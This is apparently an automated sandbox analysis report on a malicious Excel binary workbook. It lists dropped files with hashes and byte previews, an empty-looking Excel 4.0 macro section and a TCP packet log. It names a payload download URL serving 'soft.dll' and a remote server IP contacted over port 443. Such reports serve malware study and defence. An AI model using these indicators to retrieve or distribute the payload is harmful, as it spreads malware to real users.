                                                                                                                                                                MD5:5BA7AC7FA4F9E831679832B6CC22AEE8
                                                                                                                                                                SHA1:813DF24AC22C2666B28BC3E7FB9BD1EEF2A7F395
                                                                                                                                                                SHA-256:D2C19AC3EACE29239BF919C442556ABF782DA5953325EE6B2626482FBF442F29
                                                                                                                                                                SHA-512:A345B0749D5745640FD7908CDB142960DA22AC6029BAFDDC0666D11EB5033756C3CFDE84D2FB94DCBF418DF40D2CE49EC4A18B919714402B7045B96E619A27CD
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                IE Cache URL:https://quickbooks.aeymotors.com/soft.dll
                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~];V:<U.:<U.:<U....><U....;<U.7n..<<U.7n..+<U.7n..+<U.7n..,<U....1<U.:<T.c=U.7n...<U.7n..;<U.7n..;<U.7n..;<U.Rich:<U.........................PE..L....5.S...........!.....0...................@............................................@......................... >..[.......P................................'..P...8...............................@............................................text...{........0.................. ..`.data...,x...@.......4..............@....idata...............J..............@..@.rsrc................X..............@..@.reloc...'.......(...^..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\75810000
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):739934
                                                                                                                                                                Entropy (8bit):7.613757667716916
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:sRRb8XfJ2p7+wxj7QxYw8dKsWaqw+DfTtRdJyQzmiFx7llWA6zOLn1:sPD7Qy5WtFyinFxhlWAAOL1
                                                                                                                                                                MD5:919C71524C4AD38E68485B8EF18FFCFB
                                                                                                                                                                SHA1:84E886A19E5BAE94174EFCB36781BAE27F908606
                                                                                                                                                                SHA-256:00AA76BB22C8780C743BE7A458C145026EBF8F9BEE5264397575EF8A82BA3589
                                                                                                                                                                SHA-512:69D7BEB6A5271AB05F23AF87235C9655F9D3F0C24B301137C392D616E3278B9B8227E3E64F2578728E65AEF26AFEF52AB91124D6B01A4327DC864E0A64C2120D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .T.n.0....?..........C....I?`M.%.|..$..w);n..V.....;3;...f.l...L.jf.B..6.k.....QQ......."......6"U...}...zt@M..9...A.....j......T.g....C,..q.O6W..^.)Y./.o.}.....5.2...^.!..je...C7.....1;..d.1=`.\..y.3....qEsY?....4.{....J..D.d.N0..i..y?....X.C.w..-...%..2.us.....B...5.T.....9..*<.4..RI...)...GhJASY.......DG.k.rx........B.[...O.T...c.!.~..@....7.....H.......:....>.H<..Nw...Kv...S6x..c.t`.i....2N5.#.r..........PK..........!..j0.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................M
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):89
                                                                                                                                                                Entropy (8bit):4.2887395101637535
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:oVXUbUvLJXUERAW8JOGXnEbUvLJXp7n:o9UwTJXUER9qEwTJXB
                                                                                                                                                                MD5:622796DA58F76A7D579E6ACB8805C986
                                                                                                                                                                SHA1:EF5F7DDAC8FFD14F554A59272ED31AFC9CF7A4B9
                                                                                                                                                                SHA-256:04FA0E5F8C76B043A09C80EA6E59DE6666DBBDDC0A0E22E4441993DE40DF7A18
                                                                                                                                                                SHA-512:A3AD28FF335B44AD90C01832347E001536FFB2F941EAB637C4DA81CBB0922BDFE8A3F5594544532A32B4A600C51964C63B06F7E0631EFE61206D7D45A96DC059
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: [2021/06/11 05:09:05.152] Latest deploy version: ..[2021/06/11 05:09:05.152] 11.211.2 ..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF0BD071FBB4571C26.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.4086481813194674
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lobF9loh9lWUi2Xw:kBqoIq0Ui2Xw
                                                                                                                                                                MD5:5776EA1EA24C4EF818C9B1F7930236FA
                                                                                                                                                                SHA1:6D6199A413F9643D95C6622E8384E92693BF6AE2
                                                                                                                                                                SHA-256:C58D4EF803F942EF52E6E5007470AF7A00F02DCF57113D59BA9CF2B569D1DB1D
                                                                                                                                                                SHA-512:73A9DCBE5E1BBCD7744929EDECDBC9CE612A0172E2E8FB51238D3224629388B39D2823D67E18C1A0B94662A7F3959D513BE3376D57763B4F0BADB635C409B4D1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF0C381C9F25162F0F.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.40966523041045205
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9loYF9log9lWPZtZh:kBqoIrNBrh
                                                                                                                                                                MD5:8264579992805C3C669E9A52F23D0627
                                                                                                                                                                SHA1:D719FF0E06F5CA8461846BF5F9F30D815A163EFE
                                                                                                                                                                SHA-256:AFC54D813AF0ED5332197B49EB76AD0CCEDE6EB98DDAD093932671343776DE28
                                                                                                                                                                SHA-512:94C880FF9959FA655C2A2E617163ECBD4DBB3C89FCFA9B9C703998CE353492C3C9924771A38B15FB707E00073749EF7241A7A0765E4B3CC3BD2F94522E041C68
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF4271FDBD8E9E22F1.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.4125154592058443
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lomF9loK9lW8O3xj:kBqoIFz8+xj
                                                                                                                                                                MD5:4E1A34E11231735937ADCC05BB6858EB
                                                                                                                                                                SHA1:E87786FDE08C67CC84D7AF2434502A34ACC7244E
                                                                                                                                                                SHA-256:D1B6043A270856EE210590096D3E81E9917E031F4CC69983C6A846C26DC011FE
                                                                                                                                                                SHA-512:4FD191751847EB0E43BD9D52A63DB0657E5F6AC7FA337481AB82D570464221F65D91C5CA3FAEC721E156E52267ED57F80CEA5FC2F188064CC5D78869AEE1D92C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF49A83EA77EEC1211.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.40990396631859316
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9loBsF9loBM9lWBx+9nLc:kBqoIBHBhBxEnLc
                                                                                                                                                                MD5:FC793D4F4F3DCC6D4B982980F49EBB0E
                                                                                                                                                                SHA1:F496C78BBFA85FFFDB361A425A5D9BFF098A4ACD
                                                                                                                                                                SHA-256:374E1C33805069F54CBFFBE5CD199555AAE8B1A220BEE4BA0B0A8A9433CDEA68
                                                                                                                                                                SHA-512:0048AC3407C53750A20F1EA840BECB4668602482A4B28CABFAD00B8E76C3F657C0E7EFFC23245DC12566C8BB5F8A9BDC0D33137A1E242B9041A3D0D18992DE2B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF60CBFC830128400E.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40081
                                                                                                                                                                Entropy (8bit):0.6597804907804279
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:kBqoxKAuvScS+RP98fGc4UO/c4UOkc4UOx:kBqoxKAuqR+RP98fGcRO/cROkcROx
                                                                                                                                                                MD5:B41F07FE6AE34A2E20BB3E605299AFFB
                                                                                                                                                                SHA1:6F013EB3C0303609524F4C862F84A80A98C512A0
                                                                                                                                                                SHA-256:962EBFAE0C52F8995B951AEDE9B2B29C33BC646FDE6FFE6BD15E77F0F23BC08A
                                                                                                                                                                SHA-512:023EF050E473B6E022CC786306266F7D1EA5DE0C627626D63050CBD8F36567FA9C6DA3D02F76E30FBF342C4D2071707D4EEDCB7E1C6184412501B0CFC0393830
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF7C4D49990777E39E.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40049
                                                                                                                                                                Entropy (8bit):0.6534455629681263
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:kBqoxKAuvScS+vRT6h/Ug3DTDp7wUg3DTDp7zsg3DTDp79:kBqoxKAuqR+vRT6hMYzp7bYzp7QYzp79
                                                                                                                                                                MD5:A23E8DE3CD5D37D5F466898CE93B03B7
                                                                                                                                                                SHA1:B298765648C97CF0E69C77A6C23FF41B6EDE5EBA
                                                                                                                                                                SHA-256:65EBB07367E1FBB0F6D1E5CB45AB9E3AD7614D010F8C9093FDA3AE56D76659B3
                                                                                                                                                                SHA-512:F8E53D6711A7846730825F7C890DC43EA3D3F1B1970381C2C3A87418A040C178C37E117D2A1DDBDD335D9B6CA39F2320BB7E319CF5C2E612C8E17D0F9F77333F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DFC22BD3D12F5E2F3B.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40161
                                                                                                                                                                Entropy (8bit):0.6743315250600196
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:kBqoxKAuqR+npLCJ8ApcHX/ApcHXMApcHXJ:kBqoxKAuqR+npLCJ8nHvnH8nHZ
                                                                                                                                                                MD5:4295C4E20D4FB214EDF426348DB52151
                                                                                                                                                                SHA1:83A40621449F135465C3B8A0FCA9742FF01EEACA
                                                                                                                                                                SHA-256:7BDA9BD1427A2E850C01D9B8E037AC368A80366020826A3F7AC0623E874F7451
                                                                                                                                                                SHA-512:8DEE2CCA1EBB74BC12A8DD59E6D49F92BA52BB25660625A4243DE097FFC9E5D562A0FD1CF5502EDDAE5274BDE05C94692189678F75F58FFCCF932C6AE18659E6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DFF45289A08011A808.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40073
                                                                                                                                                                Entropy (8bit):0.6575076740212541
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:kBqoxKAuqR+8aAhK/LMPKV5JLMPKV5iLMPKV53:kBqoxKAuqR+8aAhK/L8KV7L8KVcL8KVJ
                                                                                                                                                                MD5:32969C2D72471F33B0A57C29E0A8A582
                                                                                                                                                                SHA1:EEB9747431108BEF30A6C4B4A4F656A508F84FA3
                                                                                                                                                                SHA-256:F2D93AF08709A19B73A1E55D748DB6109008D26B075F25A4207B5C2A7E080002
                                                                                                                                                                SHA-512:D18BDD675C7568E566562D0905A6305CE0185AAC8F0D5D529900A19D9EE95F4D65AE27D519D56DDFD835C04201E29C8FCCF5A45AAB7A88F897AC37D6D68A3F2F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\Desktop\~$my_attach_82862.xlsb
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):165
                                                                                                                                                                Entropy (8bit):1.6081032063576088
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                                                Entropy (8bit):7.837826149196617
                                                                                                                                                                TrID:
                                                                                                                                                                • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                                • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                                File name:my_attach_82862.xlsb
                                                                                                                                                                File size:300462
                                                                                                                                                                MD5:1f155a8f8c53066ef9dba8520cbcf346
                                                                                                                                                                SHA1:75dda503a5f1bbb11c8de9236ff237a7989e8e80
                                                                                                                                                                SHA256:29b13fa315a5249d1654221cf944f097ac4b0c42a133d07365cd3cc6afdd1a10
                                                                                                                                                                SHA512:f3e563c1b12cbd044c641a5cc7b0675ac0a589e01e898aea3105bef9e53f7bd2fe43b176e432955d21c8239a4c564588ed499d168c1f7bcd62337d09c1dffccd
                                                                                                                                                                SSDEEP:6144:HzL4syD+ZIa3R0RocOIHJKWQOBNRdvfAxupyHmEsHAzEKdkTtx5ooTadR/pLVo0M:D+VcGJRj5ooTadRdeFyinFxhlWAAOLf
                                                                                                                                                                File Content Preview:PK..........!.........r.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                                Static OLE Info

                                                                                                                                                                General

                                                                                                                                                                Document Type:OpenXML
                                                                                                                                                                Number of OLE Files:1

                                                                                                                                                                OLE File "my_attach_82862.xlsb"

                                                                                                                                                                Indicators

                                                                                                                                                                Has Summary Info:
                                                                                                                                                                Application Name:
                                                                                                                                                                Encrypted Document:
                                                                                                                                                                Contains Word Document Stream:
                                                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                                                Contains Visio Document Stream:
                                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                                Flash Objects Count:
                                                                                                                                                                Contains VBA Macros:

                                                                                                                                                                Macro 4.0 Code

                                                                                                                                                                ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,FALSE,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                                Network Behavior

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Jun 11, 2021 05:06:40.462929964 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:40.649384022 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.649503946 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:40.650397062 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:40.837954998 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.844822884 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.844886065 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.844916105 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.845056057 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:40.845108032 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:40.867790937 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.056504965 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.056627035 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.058192015 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.253619909 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.253680944 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.253720045 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.253758907 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.253797054 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.253834009 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.253844023 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.253866911 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.253870010 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.253926992 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.253982067 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.254004955 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.254071951 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.254093885 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.254148960 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.254159927 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.254240990 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.442147970 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.442209959 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.442254066 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.442295074 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.442337990 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.442338943 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.442375898 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.442420959 CEST4434971450.87.220.158192.168.2.3
